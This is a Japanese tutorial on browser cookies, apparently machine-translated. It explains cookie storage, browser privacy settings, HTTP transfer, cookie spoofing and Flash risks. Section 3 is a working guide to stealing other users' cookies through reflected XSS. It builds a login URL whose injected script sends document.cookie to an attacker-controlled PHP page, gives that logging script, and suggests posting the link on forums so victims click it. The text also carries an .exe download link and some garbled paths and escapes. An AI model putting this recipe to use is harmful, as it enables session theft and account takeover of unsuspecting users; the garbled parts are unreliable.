クッキーとは英語で小さなデザートを意味し、ブラウザでは常にこの言葉を目にしますが、食べ物とブラウザはどのように関係するのでしょうか。以前にログインしたことがある Web サイトを閲覧すると、Web ページに次のメッセージが表示されることがあります。「こんにちは、XX さん。小さなデザートを食べているような、とてもフレンドリーな気分です。」これは実際にはホスト内のファイルにアクセスすることによって実現されるため、このファイルは Cookie とも呼ばれます。 Cookie についてすべて知りたいですか?以下をご覧ください。
1. Cookie について理解する 対象者: 初心者向け
Cookie は、Web サイトを閲覧したときに Web サイトがユーザーのマシンに保存する小さなテキスト ファイルで、ユーザー ID、パスワード、閲覧した Web ページ、滞在時間などの情報を記録します。再度 Web サイトにアクセスすると、Web サイトは Cookie を読み取ることでユーザーの関連情報を学習し、ページ上にユーザーを歓迎するスローガンを表示したり、ID やパスワードを入力せずに直接閲覧できるようにしたりするなどの対応するアクションを実行します。 。 IE の「ツール/インターネット オプション」の「全般」タブにある「設定/ファイルの表示」を選択すると、コンピュータに保存されているすべての Cookie を表示できます。これらのファイルは通常、 user@domain という形式で名前が付けられます。ここで、 user はローカル ユーザー名、domain は訪問している Web サイトのドメイン名です。 NetsCape ブラウザを使用する場合、ブラウザは「C:PROGRAMFILESNETSCAPEUSERS」に保存されます。IE とは異なり、NETSCAPE は Cookie ファイルを使用してすべての Web サイトの Cookie を記録します。
インターネットのセキュリティを確保するには、Cookie を適切に設定する必要があります。 「ツール/インターネット オプション」の「プライバシー」タブを開きます (この設定は IE6.0 にのみ存在することに注意してください。他のバージョンの IE では、「ツール/インターネット オプション」ボタンの「セキュリティ」タブにある「カスタム レベル」をクリックして、簡単な調整を行ってください) Cookie のセキュリティ レベルを調整します。通常はスライダーを「中~高」または「高」の位置に調整します。ほとんどのフォーラム サイトでは Cookie 情報の使用が必要です。これらの場所にアクセスしない場合は、セキュリティ レベルを「すべての Cookie をブロック」に調整できます。個々の Web サイトからの Cookie をブロックしたいだけの場合は、「編集」ボタンをクリックして、ブロックしたい Web サイトをリストに追加します。 「詳細」ボタンのオプションでは、ファーストパーティ Cookie を設定できます。ファーストパーティ Cookie は、閲覧している Web サイトからの Cookie であり、サードパーティ Cookie は、閲覧している Web サイトから送信される Cookie ではありません。通常、図 1 に示すように、サードパーティ Cookie に対しては「拒否」を選択する必要があります。 Cookie を保存する必要がある場合は、IE の「インポートとエクスポート」機能を使用し、「ファイル/インポートとエクスポート」を開き、プロンプトに従ってください。
Cookie の内容のほとんどは暗号化されているため、サーバーの CGI ハンドラーだけがそれらの本当の意味を知っているだけの無意味な文字と数字の組み合わせであるように見えます。一部のソフトウェアを使用してさらに多くのコンテンツを表示できます。Cookie Pal ソフトウェアを使用して表示される Cookie 情報を図 2 に示します。これにより、サーバー、有効期限、名前、値、その他のオプションの内容が提供されます。このうち、Server は Cookie を保存する Web サイトであり、Expires は Cookie の時刻と有効期間を記録し、Name フィールドと value フィールドは特定のデータです (本紙の第 10 号、42 ページでこのソフトウェアについて詳しく紹介しています)。
ダウンロード アドレス: http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe 。
2. Cookie 配信プロセス 対象者: 中級読者 ブラウザのアドレスバーに Web サイトの URL を入力すると、ブラウザは Web ページの読み取り要求を Web サイトに送信し、結果をモニターに表示します。このとき、ウェブページは、お客様のコンピュータ上で Amazon ウェブサイトによって設定された Cookie ファイルを探します。それが見つかった場合、ブラウザは、以前に入力された URL とともに Cookie ファイル内のデータを Amazon サーバーに送信します。サーバーが Cookie データを受信すると、データベース内の ID、ショッピング記録、個人の好み、その他の情報を取得し、新しいコンテンツを記録してデータベースと Cookie ファイルに追加します。 Cookie が検出されない場合、または Cookie 情報がデータベース内の情報と一致しない場合は、初めて Web サイトを閲覧していることを意味し、サーバーの CGI プログラムが新しい ID 情報を作成してデータベースに保存します。
Cookie は、Web ページ コード内の HTTP ヘッダー情報を使用して転送されます。Cookie は、ブラウザが Web ページを開くときや更新するときなど、ブラウザによって行われるすべての Web ページ要求とともに転送されます。サーバーは Web ページの HTTP ヘッダー情報に Cookie を追加し、Web ページのデータをブラウザに送り返します。ブラウザは、コンピュータの Cookie 設定に基づいてこのデータを保存するかどうかを選択します。ブラウザがCookieの保存を許可していない場合、ブラウザを閉じるとデータは消えます。 Cookie がコンピュータに保存される時間はサーバーの設定によって異なります。 Cookie には、Cookie の保存期間を決定する Expires (有効期間) 属性があり、サーバーは Expires フィールドの値を設定することで Cookie の保存期間を変更できます。この属性が設定されていない場合、Cookie は Web の閲覧中にのみ有効になります。ブラウザを閉じると、これらの Cookie は自動的に消えます。これは、ほとんどの Web サイトに当てはまります。通常、Cookie にはサーバー、有効期限、名前、および値のフィールドが含まれます。有効期限およびその他のフィールドの内容は、ブラウザにこれらの Cookie の処理方法を指示するだけです。
3. Cookie プログラミングの実装 適用対象: 上級読者 ほとんどの Web プログラミング言語は Cookie をサポートしています。 JavaScript、VBScript、Delphi、ASP、SQL、PHP、C# など。これらのオブジェクト指向プログラミング言語では、Cookie のプログラミング利用は基本的に同様です。一般的なプロセスは、まず Cookie オブジェクト (オブジェクト) を作成し、次に制御関数を使用して Cookie に割り当て、読み取り、書き込みなどの操作を実行します。では、コードを介して他のユーザーの Cookie に含まれる機密情報を取得するにはどうすればよいでしょうか?以下に簡単に紹介します。
この方法には 2 つの主な手順があります。まず、Cookie を収集する必要がある Web サイトを見つけて、URL を構築します。次に、PHP コードをコンパイルして、Cookie を知らないうちに制御できる Web サイトに配置します。ユーザーが作成した URL をクリックした後にコードを実行できます。以下に具体的な実装プロセスを見てみましょう。
1. URL を分析して構築します。
まず、Cookie を収集する Web サイトを開きます。ここでは、Web サイトにログインし、ユーザー名「<A1>」を入力します。引用符なし) データを分析してパケットをキャプチャするには、「http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x」の形式でコードを取得します。 =28&ok.y=6"、"<A1>" を置き換えます。"<script>alert(document.cookie)</script>" を再試行します。実行が成功した場合は、URL の構築を開始します: "http://www .XXX.net/txl/login/login.pl?username=< script>window.open(" http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok .x=28&ok.y=6 "。このうちhttp:///www.cbifamily.org/cbi.phpは、特定のホスト上で制御できるスクリプトです。 「+」はスペースとして扱われるため、「%2B」は記号「+」の URL エンコードであることに注意してください。 URL をフォーラムに投稿して、他の人にクリックさせることができます。
2. PHP スクリプトを準備します。
このスクリプトの機能は Cookie ファイルを収集することです。具体的な内容は次のとおりです。
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."n");
fclose($fp);
}
header("場所: http://www.downcodes.com ");
?>
4. Cookie のセキュリティ問題 対象対象: オンラインでの安全性を求めるすべての読者
1. Cookie の欺瞞
Cookie は、ユーザー アカウント ID やパスワードなどの情報をオンラインで送信する場合、通常 MD5 暗号化を使用します。たとえ、インターネット上で暗号化された情報が悪意を持った人たちに傍受されても、意味のない文字や数字しか見えないため、内容を理解することはできません。しかし、現在の問題は、Cookie を傍受する人はこれらの文字列の意味を知る必要がなく、他人の Cookie をサーバーに送信するだけでよく、検証に合格できれば被害者の身元を偽ることができるということです。 Web サイトにログインします。この手法は Cookie スプーフィングと呼ばれます。 Cookie のなりすましの前提条件は、サーバーの検証プログラムに脆弱性があり、なりすまし者がなりすまし対象者の Cookie 情報を取得しようとすることです。現在の Web サイト検証プログラムでは、すべての不正ログインを排除することは非常に困難です。たとえば、検証プログラムを作成するために使用されている言語に抜け穴がある可能性があります。さらに、他の人の Cookie を取得することは非常に簡単です。これは、Cookie をサポートする言語で小さなコードを記述することで実現できます (詳細は方法 3 を参照)。集めることができる。フォーラムで HTML コードが許可されている場合、または Flash タグの使用が許可されている場合は、これらのテクノロジーを使用して Cookie コードを収集してフォーラムに配置し、投稿に魅力的なトピックを与えて興味深いコンテンツを作成すると、すぐに大量の情報を収集できます。クッキーの。フォーラムでは、多くの人のパスワードがこの方法で盗まれました。これを防ぐ方法については、現時点では、重要なパスワードをフォーラムで使用しない、IE のパスワード自動保存機能を使用しない、Web サイトにログインしない、といった通常の保護方法しかありません。詳細が分からないところ。
2. Flash コードに隠された危険
Flash には getURL() 関数があり、この関数を使用して指定した Web ページを自動的に開くことができます。したがって、悪意のあるコードを含む Web サイトに誘導される可能性があります。たとえば、コンピュータで美しい Flash アニメーションを楽しんでいるとき、アニメーション フレーム内のコードが静かにインターネットに接続され、特別なコードを含む非常に小さなページが開かれる可能性があります。このページは Cookie を収集し、マシンにトロイの木馬を植え付けたり、ハード ドライブをフォーマットしたりするなど、他のことを行うことができます。これは Flash ファイルの内部動作であるため、Web サイトは Flash のこの動作を禁止することはできません。私たちにできることは、ローカルで閲覧している場合にファイアウォールを開いてみることです。送信されたデータ パケットが不明であることをファイアウォールが要求した場合は、それらのパケットを禁止するのが最善です。インターネットで楽しみたい場合は、有名な大手ウェブサイトを見つけるのが最善です。